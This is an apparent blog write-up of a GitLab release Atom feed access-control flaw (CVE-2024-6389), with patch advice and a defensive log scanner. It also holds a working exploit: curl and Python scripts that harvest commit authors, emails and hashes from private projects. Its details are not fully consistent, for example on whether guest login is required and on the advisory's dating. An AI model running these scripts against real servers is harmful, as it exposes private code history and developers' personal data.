CVE-2024-6389 - GitLab Guest User Information Leak via Release Atom Feed – Full Details & Exploit Guidance
Recently, a critical vulnerability—CVE-2024-6389—was uncovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This issue allows a guest user to access commit information from private projects using the “release Atom” feed, even though they do not have appropriate permissions. In this post, we’ll cover what happened, what’s impacted, and show you a direct example of how attackers could abuse this flaw, along with guidance for protecting your projects.
What is CVE-2024-6389?
CVE-2024-6389 is an access control vulnerability in GitLab’s release Atom feed endpoint. The bug affects:
All 17.3 releases before 17.3.2
GitLab’s official advisory:
https://about.gitlab.com/releases/2024/07/10/security-release-17-1-7-17-2-5-17-3-2/
Real-World Impact
A project marked as private is supposed to restrict sensitive info—like commit history—from everyone except explicit team members. This bug allowed even *guest users* (sometimes even anonymous visitors depending on configuration) to read commit data via the API or web interface.
How? The /releases.atom feed endpoint failed to properly enforce access permissions.
Step 1: Find the Project Path
Guess or find a private repository’s path on a GitLab server. For example:
https://gitlab.example.com/my-company/top-secret-repo
Step 2: Guest User Access
Log in as a guest on the GitLab server (or just try as an anonymous user, depending on configuration).
Step 3: Request the Release Atom Feed
Replace the project path in the following endpoint:
https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom
Step 4: See the Unauthorized Commit Info
Instead of returning a “403 Forbidden,” the server will (in vulnerable versions) send back an Atom XML feed containing commit messages, author names, emails, and commit hashes.
Example: Atom Feed Response
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Releases · my-company/top-secret-repo · GitLab</title>
  <entry>
    <title>v1.0.0</title>
    <author>
      <name>Alice Developer</name>
      <email>alice@example.com</email>
    </author>
    <content>
      Release notes: Initial release!
      Commit: 62b3fbb...
    </content>
    ...
  </entry>
  <!-- More entries -->
</feed>
Step 5: Weaponize the Data
The attacker can simply fetch the Atom endpoint with a tool like curl or using any web browser. Here’s an example with curl:
curl https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom
No authentication is needed! You’ll receive the Atom feed with all commit data about each release.
Here’s a Python snippet for automating the process and extracting all commit hashes and authors:

import requests
from bs4 import BeautifulSoup  # the 'xml' parser used below requires lxml to be installed

url = "https://gitlab.example.com/my-company/top-secret-repo/-/releases.atom"
response = requests.get(url, timeout=10)

if response.ok:
    soup = BeautifulSoup(response.content, 'xml')
    for entry in soup.find_all('entry'):
        title = entry.find('title').text
        author_node = entry.find('author')
        # Atom entries may omit the author element or its email; fall back to empty strings
        author = author_node.find('name').text if author_node and author_node.find('name') else ''
        email = author_node.find('email').text if author_node and author_node.find('email') else ''
        content = entry.find('content').text
        print(f"Release: {title}")
        print(f"Author: {author} <{email}>")
        print(f"Details: {content}")
        print('-' * 60)
else:
    print("Could not access Atom feed. Maybe already patched.")
Mitigation & Fix
GitLab has issued patch releases to close this vulnerability. Upgrade immediately if you’re running affected versions:
17.3.2 or later (for 17.3 series)
Follow GitLab’s official upgrade instructions for your installation type.
If you can’t upgrade right away, it’s recommended to firewall off external access to any private projects.
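While the patch is being rolled out, it is worth checking whether the feed endpoint has already been read by anonymous or guest accounts. The script below is an added example, not code from the original post or from GitLab: it scans constructed log lines shaped like GitLab’s production_json.log for HTTP 200 reads of /-/releases.atom on projects you know are private, and groups the results by source address. The field names (path, status, username, remote_ip), the list of private projects and the trusted-user list are all assumptions to be adapted to your instance.

```python
import json
import re
from collections import defaultdict

# Constructed sample lines shaped like GitLab's production_json.log (one JSON
# object per request). The field names are an assumption; verify them against
# your own instance's log before relying on this.
SAMPLE_LOG = """\
{"method":"GET","path":"/my-company/top-secret-repo/-/releases.atom","status":200,"username":null,"remote_ip":"198.51.100.7"}
{"method":"GET","path":"/my-company/another-private-repo/-/releases.atom","status":200,"username":null,"remote_ip":"198.51.100.7"}
{"method":"GET","path":"/my-company/top-secret-repo/-/releases.atom","status":200,"username":"guest.user","remote_ip":"198.51.100.7"}
{"method":"GET","path":"/open-source/public-tool/-/releases.atom","status":200,"username":null,"remote_ip":"203.0.113.9"}
{"method":"GET","path":"/my-company/top-secret-repo/-/releases.atom","status":404,"username":null,"remote_ip":"203.0.113.9"}
{"method":"GET","path":"/my-company/top-secret-repo/-/commits/main","status":200,"username":"alice","remote_ip":"192.0.2.5"}
"""

# Matches the release feed path and captures the full namespace/project path.
RELEASES_ATOM = re.compile(r"^/(?P<project>[^/]+(?:/[^/]+)*)/-/releases\.atom$")

# Constructed: in practice, pull projects with visibility == "private" from the API.
PRIVATE_PROJECTS = {"my-company/top-secret-repo", "my-company/another-private-repo"}


def find_feed_leaks(log_text, private_projects, trusted_users=()):
    """Return sorted (remote_ip, username, project) tuples for HTTP 200 reads of
    /-/releases.atom on a private project by anonymous (username null) or
    non-trusted users. Non-JSON lines are skipped rather than aborting the scan."""
    hits = []
    for raw in log_text.splitlines():
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue
        match = RELEASES_ATOM.match(rec.get("path", ""))
        if not match or rec.get("status") != 200:
            continue
        project = match.group("project")
        user = rec.get("username")  # None for anonymous requests
        if project in private_projects and user not in trusted_users:
            hits.append((rec.get("remote_ip"), user, project))
    return sorted(hits, key=lambda h: (h[0], str(h[1]), h[2]))


def suspicious_sources(hits, min_projects=2):
    """Group leak hits by source IP; an address that read the feeds of several
    distinct private projects looks like enumeration rather than a stray click."""
    by_ip = defaultdict(set)
    for ip, _user, project in hits:
        by_ip[ip].add(project)
    return {ip: sorted(p) for ip, p in by_ip.items() if len(p) >= min_projects}
```

A hit from an anonymous user on a private project is exactly the condition the patch removes; a source that touched several private feeds deserves a closer look regardless of patch status.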
Original References
- GitLab Security Release Advisory
- CVE Details page (pending)
Conclusion
CVE-2024-6389 is a stark reminder that even mature platforms like GitLab can ship with critical permission flaws. Anyone running an affected version should prioritize deploying the patches. Attackers don’t need any deep skills—just a project path and a browser. Don’t wait: review your exposure and update GitLab today.
For questions, check the GitLab issue tracker or their security contact process. Stay safe!
Timeline
Published on: 09/12/2024 17:15:05 UTC
Last modified on: 09/14/2024 15:10:39 UTC